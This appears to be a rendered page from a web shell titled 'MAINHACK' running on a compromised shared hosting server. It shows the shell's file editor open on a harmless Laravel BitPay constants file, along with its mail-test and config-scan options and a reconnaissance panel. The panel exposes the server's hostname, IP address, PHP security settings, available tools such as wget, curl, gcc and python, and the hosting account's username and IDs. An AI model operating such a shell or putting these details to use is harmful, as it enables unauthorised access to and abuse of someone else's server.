[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: BitPayConstants.php
<?php namespace Vrajroham\LaravelBitpay\Constants; interface BitPayConstants { // TODO: Deprecate 'Invoice Exceptions', 'Subscription Schedules' and 'Settlement Statuses' after upstream merge & update (^6.0): https://github.com/bitpay/php-bitpay-client-v2/pull/69 const DATETIME_FORMAT = 'Y-m-d\TH:i:s\Z'; // Invoice Exceptions const INVOICE_EXCEPTION_PAIDOVER = 'paidOver'; const INVOICE_EXCEPTION_PAIDPARTIAL = 'paidPartial'; // Subscription Schedules const SUBSCRIPTION_SCHEDULE_WEEKLY = 'weekly'; const SUBSCRIPTION_SCHEDULE_MONTHLY = 'monthly'; const SUBSCRIPTION_SCHEDULE_QUARTERLY = 'quarterly'; const SUBSCRIPTION_SCHEDULE_YEARLY = 'yearly'; // Settlement Statuses const SETTLEMENT_STATUS_NEW = 'new'; const SETTLEMENT_STATUS_PROCESSING = 'processing'; const SETTLEMENT_STATUS_REJECTED = 'rejected'; const SETTLEMENT_STATUS_COMPLETED = 'completed'; // Invoice Webhook Codes const INVOICE_WEBHOOK_CODES = [ 1003 => 'invoice_paidInFull', 1004 => 'invoice_expired', 1005 => 'invoice_confirmed', 1006 => 'invoice_completed', 1012 => 'invoice_manuallyNotified', 1013 => 'invoice_failedToConfirm', 1016 => 'invoice_refundComplete', ]; // Recipient Webhook Codes const RECIPIENT_WEBHOOK_CODES = [ 4001 => 'recipient_invited', 4002 => 'recipient_unverified', 4003 => 'recipient_verified', 4004 => 'recipient_active', 4005 => 'recipient_paused', 4006 => 'recipient_removed', ]; // Payout Webhook Codes const PAYOUT_WEBHOOK_CODES = [ 2001 => 'payoutRequest_funded', 2002 => 'payoutRequest_completed', 2003 => 'payoutRequest_cancelled', ]; }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285